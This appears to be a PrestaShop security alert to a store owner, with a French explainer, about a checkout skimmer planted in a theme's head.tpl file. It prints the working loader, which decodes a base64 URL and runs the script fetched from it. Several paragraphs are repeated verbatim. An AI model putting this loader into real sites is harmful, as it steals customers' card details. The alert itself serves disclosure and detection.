Prestashop Security Alert 12-02-2026
Hello Brahim,
We have recently identified a security threat affecting some online stores within the PrestaShop ecosystem. A malicious script (“digital skimmer”) has been detected and may have led to the theft of customers’ payment information.
This malware operates by replacing the legitimate payment buttons on the checkout page with fraudulent ones. When a customer clicks on one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their bank card details.
The skimmer is simply loaded through a <script> tag, written directly inside the file _partials/head.tpl of the active theme of the store. This means the attacker was able to modify a file on the store. Inside the script tag, the following code can be found:
We have recently identified a security threat affecting some online stores within the PrestaShop ecosystem. A malicious script (“digital skimmer”) has been detected and may have led to the theft of customers’ payment information.
This malware operates by replacing the legitimate payment buttons on the checkout page with fraudulent ones. When a customer clicks on one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their bank card details.
The skimmer is simply loaded through a <script> tag, written directly inside the file _partials/head.tpl of the active theme of the store. This means the attacker was able to modify a file on the store. Inside the script tag, the following code can be found:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
The part aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz changes every time, but the structure of the code remains the same, and the atob() function is always used. Some code can be found before or after (the skimmer attempts to hide itself by being a little different on every shop).
At this stage, we strongly recommend you to perform a thorough security check of your PrestaShop stores and ensure none of them has been compromised. You can also check this page for further details on the situation.
Our technical teams are actively investigating the origin of this attack and are taking all necessary measures to prevent further impact.We thank you for your vigilance and cooperation.
🔎 Que fait ce code ?
At this stage, we strongly recommend you to perform a thorough security check of your PrestaShop stores and ensure none of them has been compromised. You can also check this page for further details on the situation.
Our technical teams are actively investigating the origin of this attack and are taking all necessary measures to prevent further impact.We thank you for your vigilance and cooperation.
🔎 Que fait ce code ?
- atob() décode une chaîne en Base64
- Cela génère une URL externe
- Votre site charge un script malveillant caché
- Ce script :
- Remplace les vrais boutons de paiement
- Affiche un faux formulaire bancaire
- Vole les numéros de carte des clients
⚠️ C’est très grave si votre boutique est touchée.
❗ Pourquoi cela arrive ?
Dans 80% des cas :
Module nulled / piraté installé
Module nulled / piraté installé
- Version PrestaShop non mise à jour
- Mot de passe faible
- Accès donné à un freelance non sécurisé
- Ordinateur infecté
